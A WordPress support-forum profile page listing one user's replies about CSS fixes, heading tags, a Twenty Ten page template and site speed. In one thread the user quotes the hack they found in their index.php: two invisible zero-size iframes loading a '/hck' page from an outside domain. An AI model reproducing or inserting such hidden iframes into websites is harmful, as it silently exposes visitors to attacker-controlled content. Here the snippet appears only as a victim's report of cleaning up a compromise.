portermonkey
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Horizontal scroll bar?that solved that issue but set my first column over with no padding?
Forum: Fixing WordPress
In reply to: Horizontal scroll bar?thanks!
Forum: Fixing WordPress
In reply to: I rremoved "entry-titles" but they still get creditthank you
Forum: Fixing WordPress
In reply to: I rremoved "entry-titles" but they still get creditI already am not displaying the page titles. And they are being given an h1 tag. I want to apply h1 tag elsewhere and i do not think it is good to use it more than once on a page. Nor can it be good to use it for hidden text
Forum: Fixing WordPress
In reply to: I rremoved "entry-titles" but they still get creditthere is nothing like that in my page.php.
here is all of it (it is small so i post)
<?php /** * The template for displaying all pages. * * This is the template that displays all pages by default. * Please note that this is the WordPress construct of pages * and that other 'pages' on your WordPress site will use a * different template. * * @package WordPress * @subpackage Twenty_Ten * @since Twenty Ten 1.0 */ get_header(); ?> <div id="container"> <div id="content" role="main"> <?php /* Run the loop to output the page. * If you want to overload this in a child theme then include a file * called loop-page.php and that will be used instead. */ get_template_part( 'loop', 'page' ); ?> </div><!-- #content --> </div><!-- #container --> <?php get_sidebar(); ?> <?php get_footer(); ?>
Forum: Fixing WordPress
In reply to: I rremoved "entry-titles" but they still get creditcheck out my “testimonials” page for example. I removed the .entry-title (by not displaying it) for the page. but when i check the tags on that page the entry title is an h1 tag, so my h1 tag for that page is basically hidden text.
Forum: Fixing WordPress
In reply to: trying to center sticky post titleThat worked! I could have sworn i tried that already (guess not)
thanks greiz!
Forum: Fixing WordPress
In reply to: trying to use CSS to remove stickky post metaI used :
.sticky .entry-meta {display:none;} .sticky .entry-utility {display:none;}
to get rid of it
thanks everyone.
Hey Ed, I am emailing you now from your site contact form.
thanks
oh yeah, I am glad you are excited!
So maybe not even necessarily my PW but a neighbor on Bluehost?
I changed all my PW’s and did all the suggestions in the Codex. And installed a few security plugims, so hopefully I have prevented this same thing from happening?
thanks again for the input.
thanks for replying!
any idea how someone got that code into my index.php?
Forum: Fixing WordPress
In reply to: my page opens at the bottomthanks. I just changed my WP and bluehost PW and am going through all my files.
? would a search using the bluehost search within my files find the hack if it were there?
thanks
Forum: Fixing WordPress
In reply to: my page opens at the bottomI found the code in my Index.php and deleted it and i am good now. I hope.
I suppose i need to make the files read only?
did they get to it from my website? my cpanel? filezilla?
my computer is clean.
thanks
Forum: Fixing WordPress
In reply to: my page opens at the bottomlook at my source code.
i see this in there:
<iframe src="https://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe><iframe src="https://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe>
is is some kind of facebook hack.
do you see this?
thanks
Forum: Fixing WordPress
In reply to: Would a cdn help my site?“Where are your users? “
the ones i care about are within a 200 mile radius.